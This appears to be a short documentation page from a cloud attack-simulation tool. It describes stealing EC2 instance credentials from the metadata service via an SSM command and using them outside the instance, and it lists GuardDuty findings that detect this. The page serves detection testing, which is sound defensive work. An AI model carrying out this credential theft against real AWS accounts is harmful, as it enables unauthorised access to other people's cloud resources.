Steal EC2 Instance Credentials
slow idempotent
Platform: AWS
MITRE ATT&CK Tactics
- Credential Access
Description
Simulates the theft of EC2 instance credentials from the Instance Metadata Service.
Warm-up:
- Create the prerequisite EC2 instance and VPC (takes a few minutes).
Detonation:
- Execute a SSM command on the instance to retrieve temporary credentials
- Use these credentials locally (outside the instance) to run the following commands:
- sts:GetCallerIdentity
- ec2:DescribeInstances
Instructions
Detection
GuardDuty provides two findings to identify stolen EC2 instance credentials.
- InstanceCredentialExfiltration.OutsideAWS identifies EC2 instance credentials used from outside an AWS account.
- InstanceCredentialExfiltration.InsideAWS identifies EC2 instance credentials used from a different AWS account than the one of the EC2 instance.
See also: Known detection bypasses.